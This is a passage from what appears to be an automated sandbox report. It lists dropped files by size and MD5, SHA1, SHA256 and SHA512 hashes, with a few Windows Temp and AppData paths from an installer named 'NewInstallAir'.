SHA256b675eb022ee5334945ed0f90a4a960cff29ab721e19e2cb74ce39f543c73813c
SHA51231f5718b060f0e2037ac12b5fa2755bd7de935bbdfed19c4c23cbd4c12567c46219dbf88e3ee63056cf0aa0ac1d248b6ceb21010584c9121bbdce730a2718291
-
Filesize
77KB
MD559873b6fbb4ea3a1d3b57bd969fd08e2
SHA18978d494cf2d92ed3ab4d957550392665bdae5f1
SHA256f944ddf5b77d51de56b566b88a6abe3875ebba93fc5671c33e92108fe779cf97
SHA51279178c4bbee68127d18a68621876f181803f82683b92945f8afa52a773a5aa3f0c13ddeeef2678c89595460940f3c0324d47bb651ba5ee021b2a973e7a83f684
-
Filesize
95B
MD5fcdb14c8db42043b11e57547cb67e7f9
SHA1d81fe8782476715c4e741d593a9d5b1b6dfbfd5d
SHA256371917a6dbf74e242bc5b828c23db5d20a865e3ba88361494167056e2507e8ae
SHA5120c5160ed7d952037e50bd891360d360e1b14ae4f0b6a3f06badf1dcecd9183be7495840ca13743e5aac5e0177175e1aedde332e2adc96edbc50158b9d24ba578
-
Filesize
98KB
MD5f36f5375614ecbf2038b06a0615db2d4
SHA188edc1ace9e2bd518ed50f002e9e633cf623f29d
SHA256373efdad3c7c31533984cef71066e88a919a71365d427c9126398be0ddc12146
SHA512743bd0a3e91b0d8b42233028d6fa958041b5de15618244e99242ff1382cdc281a5b62c673b77cc5ddef0c698eadf0f210f0a33df0e1cedab8e8492db8d5d6a27
-
Filesize
1KB
MD5bbf46f99e48e0c21241025dfd79f1a87
SHA1e8644f8faa90edf7e7f06d327e6bf2112d92bee7
SHA256c0ec75b44dbecb80d621d4600d124544536efb0a5e40b4cd927f9f8145c61f94
SHA51264f02d1ff552cff477f41978c00e257a96abcc1f5a589d3f0113118e5dcd5c74dacf38898c9d9152537b0a112823abdfbbc005cec069b140607d9d2af4e73f9a
-
Filesize
15KB
MD53641846128e0a27a28ca0dba8942b896
SHA188c40c9923ab48e0c01883a773e297541ce49882
SHA256cbf7cd45fe193e0a438ce14b0176077762e984f897091a682f9e866983da9174
SHA51215910e5a279f17ea06618cb8dcbb64fe8f8e6f5061fc14bca6a92ff2795cf64eaceb2067104358a014079550ca1b4f24200935e2f10b1ede6622d94794047550
-
Filesize
688KB
MD5d875875eb3282b692ab10e946ea22361
SHA134bcef8a8cb0e1db44671892ac3cbd74d3c541a8
SHA2560eca2e140f973b2011c633d4d92e512a1f77e1da610cfe0f4538c0b451270016
SHA512972466310d3c145141320584b5f3e431c6888bda2ba1036f85e68e534ed6fb97ba04cbd46d8d9c401dc5857100dc1bff1bad82b50514f3e5c582522f22fd2b5c
-
Filesize
14KB
MD510af715dfb97b8a187f81555c8e6068b
SHA1c108e08d53a6ec711f1ba70fdbd7561ce483cbcd
SHA256ee7f804a1c73b6d6935ff731ae87aefbbd1abe16dc5ff315c5d8d91e283c902d
SHA512fdca596438fdd60c88de69367abc70d6cbff318d8381eb4155fa257690f26d95c9a13131f676654bed27be458a6df67cbe1d713de9826cf955723f6a92fc5bbb
-
Filesize
1KB
MD5402c9d31e2079948e743562cb48af2a6
SHA15111e39a19e0675a44369e03d4a82132f0d12977
SHA256d82df7afa80ab17cf1d298488c66902f192034b6bb18176f5bd5c5b74e348e79
SHA51227510489faa6562507cbdb0b5f545d9124d6ba59d41a65224dd6089a9c8331279ce83905b26d41453255bda660fbaae957e0e17d43350dfcb86603888177c760
-
Filesize
1.4MB
MD5a2ff2c72e739e0cf4c73b623444ca39d
SHA1ff886e63c894a20f30c136a8264cfa33d41b8331
SHA256c1eb83993c85e01ee6ae84eb6e05744ff8c3ccc02c41d09c22286e3012ef46fc
SHA512844dab35a1625d5bf1bd814a36fb80d5670d3dfee5cf65ad8be53784b486dcc08898b7577a323c7c7e1e83655f861ea86c5453cfa4c3d55353d329ef3af6320b
-
C:\Users\Admin\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes\NewInstallAir\NewInstallAir.ui
Filesize1.1MB
MD5d34c31255bf6d5c6085a0ae3bcb5d26c
SHA109cba08569047a67d9b6426bdd44c483f0af462e
SHA256ea5961d466942b8cb96bf9c1fb2a22bc7a913077978e64e1b1e7621b88fba394
SHA512d50b0107c76ec7ff6ccff370ce91181050a0febda1caab58442fc79f6243b45e4f77494af890c6b3f431cb41f2ccbfc24176d28983652ad09a22788d99d687c8
-
C:\Users\Admin\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes\theme_NewInstallAir.xml
Filesize27KB
MD5d9ac7a98975e8073a3fa08af3bdeeb1a
SHA1c05861e7e23b08cd77ce6e43d8ba101008646e3d
SHA2568ab731632b80ecd8c91071c36d12edfdad404ad4debbd663023360278a614817
SHA5128fa58ddf1607e40262b032da6d69dacd8eca35da5a0ab5c9a1441469704aad12ef4807b7fecdb22740d0191da2ee32fad5b8e96d298f78c07889bef8bf82a1ca
-
Filesize
1.6MB
MD51d25b2913c139d96cac373f308221c27
SHA1de255c8cf9cfd6768b08d52615935b63b02090c5
SHA2566395b9fa2df40c5f45467a3a042a97ee48a162cd52d9a24e839d347013fedf2e
SHA512f79de06f60895f4ca7ffd06340aed83206d0f61d16dcd61046cc265ed619e027369448fe593564df58543768ddf9c50b370d6abb9b997b50333fbfed21ca71f8
-
Filesize
1KB
MD526a64aaf4ced40fd6fd4917d4b57d48f
SHA1c5cbaaf3dc111fa912f3ba601d3503db87b4d890
SHA2568cf9d9a278cb62e8fcd63335498882fdd7acddbaaf17163cdc8cd3354f1e3b6e
SHA51294d537bf0023dd89b46c0df615526312510b17fa3dbe90d35bec375ff25781c57915119a0be37dbe2dc780935bac987966ad272ea6f60ffbf97f7b0fe887acb1
-
Filesize
1.4MB
MD5b6573421fa6713e7060af7298af28804
SHA159a58d8dec778c6937cf261f16a5ef3aad9de315
SHA25623d2b040f587a2823b2aa35a1de221fa485c78f2ba230a38913ba149a0458b5d
SHA512431f1ecb1c269bddcc4466f0c60149cab0ea7684a58e0394fb5c80180a7eefa0476f0894c9371fb889e5f20e3487e03b534624e270dba1ce2cb70acbfa248336
-
Filesize
4KB
MD5fb5980c478894a0d0999e0541b2eb1d3
SHA105a5f8499a04c2898ea4bb896934dde343020293
SHA2565d297c94d94529bb652405c76bfdd7b2d8365cc6cddc72310ab250242ea12145
SHA5128a4facd941685cafa4878992e59bf31c2288cb722d69f3b4fbee43d0ce8d4d8563c7d6f01a40b578fed0393d21b7007b018ed0b7bf3a7933e319290db0ec7009
-
Filesize
1KB
MD523545f16d9df345985bd3219e1c63186
SHA16135202057e821c169417ecf79dce850c1909cd5
SHA256c0c661230b1bd30f5f76e2a68bb0120f27fb274779953a5393e22bb5a1dcc624
SHA5128475a26e973fd49bfa22703de41996b7e95287154de030b6ed4364b0cbdbe4bef9be2f46fac649a460be6c5feb4086224323e36b7c18c6070e98d2e20e2d234b
-
Filesize
2KB
MD528a99d7f6f6331ad7912bec237d508d5
SHA1247715d921b1d90b401d2ea4f372ef3e5ddfdf5c
SHA25672d936e41f4c9ae8c66e5bf8e58a6b6653651372acd3f198fc9a28fc7325beec
SHA512b8cd448f724b41dfcbad1dd4d73e7a9eb0aafdcf02229f179125dd0a76a8b180a3a88cb3a51eab5eb4fad87daeb087de2a6c188ffe22f4876334f4025f9fbb7f
-
Filesize
631B
MD5b3e4f2b3bfd945dcfb8b89597d62c33a
SHA13671807b21cfa22a9f22e97b91c55c5b45b50059
SHA2566c393360869431bd8d770afad267493bf9c4ed25080983b2e4608f51bb3e258c
SHA512315779049170da71baab255f14a1ac2e0b0fb914a9ba023b3d7e1189b9d42bb0636c78d4d10771fe194c78424cf06f1e267037dab67b12d370dffe41c3756dc2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_6F2A479ACC34409A81F6C3FD031D41B7.dat
Filesize940B
MD55ef608c9e4acbec0f9c64311997de23b
SHA16fe038a8ef51f48e0525b79423bd73dcc3e4dc7d
SHA256902e2c928ef34ab68823b2d7c5ea7b815f9a93027d6abd8f69d9dd364cabb130
SHA5128cdabf6c2a338c34de4f2bf38aa24cd45c776a1d76fcb6fbf334a8256f85a09db807582d1d1946029847bfc9a21fc9238b69a2e75b0cf51c6cfc1893aa0608a0
-
Filesize
102KB
MD558b8a310062c14e1bda89a6da94acd79
SHA1445ada76e0839485bb9da9571de574826f9855b3
SHA256ce7ae488bb07e919118f14a5600d117ad6426a0fcd6eaef8b2c5d87cdaccb04a
SHA5121460d9961b7a2910cee3ca6924e016c653ea61e2e77d4db4762ef9bdfb5cdc451acc20ae8117473cb7acbb3b97d7c881dc192132adb53c86e67127906c06aafd
-
Filesize
10KB
MD5f3f5c6774ec1b4aaf7587f932c4abdf6
SHA11bc154d806e673e89a751bc8be2919c2ae253953
SHA2563bb7ea2b9b8d982d3b64fd800c012d9e8d225e1039b8de0ae0c5e761c3e9e763
SHA5127f915ed043430a53195993a8d68378c428a4acf5a812e8f19a879e9111fad72d9775254250a9b9cbb3b339d4d2ceda438fe60cda78a9b6627df86014c0ab214d
-
Filesize
2KB
MD51c9a2d035309f87f5c25c1b61df705ed
SHA19ef23e6395b6480a9fb5f9ed9a1a54245aab4395
SHA256945fe4c3904ee5853b529ad421b48bb0424bcabb6cdd8d52a5d674e363e7842b
SHA51208d79760338241d94bd56d6b477b6392b554df23810f93c201094e17e2601b92f9b9f76f1a28470d4fbe9535a4cdf0b0e1d89a38fffac749742c9c6d302b9006
-
Filesize
1KB
MD567fc5b9d0957c4fbb37376de49a2b170
SHA1f0d4bf669147086c9ea372d51c6b61fa29d718fe
SHA2568ade5e7080e6d5337ca9b4bd31c9963dc556406189b53263dd5b37a9fbbba523
SHA512784f762b34f037804eab1e6e16e771571ed12d7a80740e4fc33fda386d6d24db661b4d5ab212ba468ce1b8e94aead0983de89930cc230144fcd72e4e14ce6710
-
Filesize
1KB
MD5433beb80b71571e63ccc316dd6343d10
SHA186e4f9d0fb901616eb6080629b48828673f0e951
SHA256bfb9003b906bec751c60729db239ab7fdb3bed2e6dfeaa18b2c61147f7e9f9e5
SHA512208d33cbf9df35e701c02a59a5f452b1ad968d81ba34eb375456028838f8cd6fb5a10a28695b66ff7feb91a07e4ca36248feecd92a8fe577a6d602aed8cd0bfd
-
Filesize
100B
MD5f93b0cf9ddcc212085056a3efb495e4b
SHA1e2e5881ea8f1b63e98b27e0163c13de3c3b34610
SHA256b1a3afa87d93845aa8b52bc4b69cc216482506726deb8ec50554af7aba2b76ca
SHA512e620a06be611a6d2cd85b2885af6300dcd8288c70bffaa6fecdff874410b7e9f3ea4b319ec140ecefab4d66485d94562812f538b4be554c4322e7bf560ac9c9a
-
Filesize
22B
MD5266a0ee2733f68217b2f7550ae05e2ae
SHA1164dca50cc1c01dae100337ecd481572cbe05917
SHA256baba797e4a575eff8ee4a96ecc814666179fd55c3f4c27e3613de2633875e127
SHA5121eb206ebed0720e5442326e921bdc4f0259c7b8b7ab59eb265e01dc29983eba9a522fe53aef3c7471c74d4b4f7bd9ead8048edb9ae4fe554d8f6b8a9204623e9
-
Filesize
3KB
MD55f41d26fa1f04f1f8a98e0797e343466
SHA10c3aa31499d6e0d0520788fe2c95870ec0bd38b0
SHA256c685493f06295a6829ae273e6c991fcc38def61bf84625aaf1544a66ff2bbfd6
SHA512b4f0f4a4e6a74c9520c1f3c78f828b155c67eba648f7bebebf2bf56228b84ad6796fa8c285f8f0d35bd7bc7f6afabe02e3e5c0991b4542a563b226d24793dc62
-
Filesize
3.9MB
MD5d7eb413082a84c2addfc0776791495cf
SHA15c18c26bc563f1288f5420a2511c6ac69ce6514d
SHA256eb72ebbe03d43c92137668855364d84754adf8e81635754c6537b5582f0cec0a
SHA5123f71af0e44170bcc38dd3a71c39d3553d689f9e8e79d1c90cc1ab0ed2a3c0531777b1b21d2bcb8b9f514841b6af6a8aebdc8c40100819f19ebb5a0213faae74d
-
Filesize
40B
MD526ba97c6e6faf84371305d38bd201a29
SHA104d9c0bbf514f80020060bf5622f312c2c75e257
SHA2562b967d73a1509062c5b8caa59664bb66dc6cda67411cadd5166ad3a6e3d2ea48
SHA5122958ada13aefff1133c79a66dd4c3bcfdfe44c6bcffdc70d76af8c3908c1312c3d44e096d6d17292011dbc8e2c9d31a4bbba0c65930e511007aa51ba224b5779
-
Filesize
652B
MD5c2fe06b9f539fcfc2fcb8edb68c213ba
SHA1da001ebb5baeb577bc7b83e96a69530fd8d1fa0b
SHA256c965eb4e847adcc220af8a4ee51812d121a9c8233005f90832999d80286472eb
SHA5128f070fb8b06a6544b481a8be338f68e3cef6a50b84c4c0c36e844bc72a77419a61415f45c2bfdb8062ebfffeeb862348e3578b236f1d976495d80dec9c09e57e
-
Filesize
210B
MD5737c81ce219766e0762f72b283818c3c
SHA194b59fb22dcc44483ae00faef1c35f53569cd16b
SHA256e52f2ac7d595e9f088882339bdf38a6f92332ddf0aceedf5fa06c561acf2b1bd
SHA512818bd6f37e759eebb6ae76be9452b2d3c5f51acd95d8e60580bd1ec78dc0b5b69f1dc40cea1843f0d4be5835a20a8086ad2250cfdd8968aee33aeb1f7941531d
-
Filesize
369B
MD58467ea005bb5eb29ce6b2a6e42bd5b7e
SHA19047c4bf4d62e082742a4850834a5b2c3dcb6749
SHA25678310105040537664b1dc85bba3a8c2588bc312f80ccefd543f7df1953a12476
SHA512f6a5029acedda7d0a181079d31d3aa66a3f8ba7f0ec267f9a653c19a9a9576757ef0300a399776195e15f0a951f9dff06cc874614ae7887410105bd824274d79